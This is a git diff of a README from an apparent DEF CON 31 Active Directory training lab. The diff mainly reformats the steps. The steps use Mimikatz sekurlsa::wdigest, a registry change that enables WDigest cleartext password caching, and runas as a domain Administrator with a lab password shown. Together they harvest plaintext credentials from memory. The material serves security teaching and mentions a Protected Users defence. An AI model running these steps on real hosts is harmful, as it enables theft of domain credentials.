arosenmund/defcon_31_ad_good_bad_lolWut/1_ad_credential_grabbing/1_credentual_grabbing/README.md

     sekurlsa::wdigest
     ```

+    The above commands explained:

+        1. Set our required privileges
-    Above we set our required privileges, begin logging to a new file named `m.txt` (which resides at `c:\Users\Public\Desktop\LAB_FILES\assets\mimikatz_trunk\x64\m.txt`), list provider credentials, and then list WDigest-specific credentials.
+        1. Begin logging to a new file named `m.txt`
+            - Log location: `c:\Users\Public\Desktop\LAB_FILES\assets\mimikatz_trunk\x64\m.txt`
+        1. List provider credentials
+        1. List WDigest-specific credentials

     Let's review the contents of the Mimikatz log file!

 1. Open the `m.txt` log in notepad via:
-    1. Start menu -> type `run` -> click "Run (App)" -> Enter `notepad c:\Users\Public\Desktop\LAB_FILES\assets\mimikatz_trunk\x64\m.txt` -> Enter/Click OK
+    1. Start menu -> type `run` -> click "Run (App)" -> Enter

+    ```powershell
+    notepad c:\Users\Public\Desktop\LAB_FILES\assets\mimikatz_trunk\x64\m.txt
+    ```

     As you scroll through the log file, you may note that there are no cleartext credentials for a domain account.
 Let's change that :).

     We are going to enable cleartext password storage for WDigest.
-TAs love to do this, though you can prevent this for targeted accounts by placing them in the [Protected Users Group in AD](https://for528.com/protectedusers).
+TAs love to do this, though you can (_and should!_) prevent this for elevated accounts by placing them in the [Protected Users Group in AD](https://for528.com/protectedusers).
 In this environment, that hasn't been done, so let's take advantage of the situation.

 1. Close Notepad

-1. Launch a separate PowerShell window (do not close your current Mimikatz prompt) as admin and run:
+1. Launch a separate PowerShell window as admin (**do not close your current Mimikatz prompt**) and run:

     ```powershell
     reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
     ```

-    You have just adjusted the WDigest settin to store cleartext passwords in memory.
+    You have just adjusted the WDigest setting to store cleartext passwords in memory.
 Many orgs do not prevent and/or alert on this activity, so it's a go-to for TAs such as ransomware affiliates.

-    Next, you are going to emulate a domain account running a process on the host.
-This emulates a real-world environment in which a help desk employee connects to the machine, a task is running via a domain account, a service is running via a domain account, etc. We will use `runas` to run `notepad.exe`, though in the real world this account may just connect remotely to run whatever process.
+    Next, you are going to emulate a domain account running a process on the host. **This emulates a real-world environment in which a help desk employee connects to the machine, a task is running via a domain account, a service is running via a domain account, etc.** We will use `runas` to run `notepad.exe`, though in the real world this account may just connect remotely to run whatever process.

 1. In your current PS window, execute Notepad as the `WHEEL\Administrator` user:

-    1. `runas /user:wheel\Administrator notepad.exe`
+    ```
+    runas /user:wheel\Administrator notepad.exe
+    ```

-    - You will be prompted to `Enter the password for wheel\Administrator:`, at point you will enter the account's password:
+    - You will be prompted to `Enter the password for wheel\Administrator:`, which is:

-        - `12qwaszx!@QWASZX`
+        ```
+        12qwaszx!@QWASZX
+        ```

     _Minimize the Notepad process window_ -- **DO NOT close this window**

 1. Back in Mimikatz, run the following command:

-    - `sekurlsa::wdigest`
+    ```
+    sekurlsa::wdigest
+    ```

     Either scroll up in the Mimikatz window buffer or once again load the `m.log` file via `notepad c:\Users\Public\Desktop\LAB_FILES\assets\mimikatz_trunk\x64\m.txt`.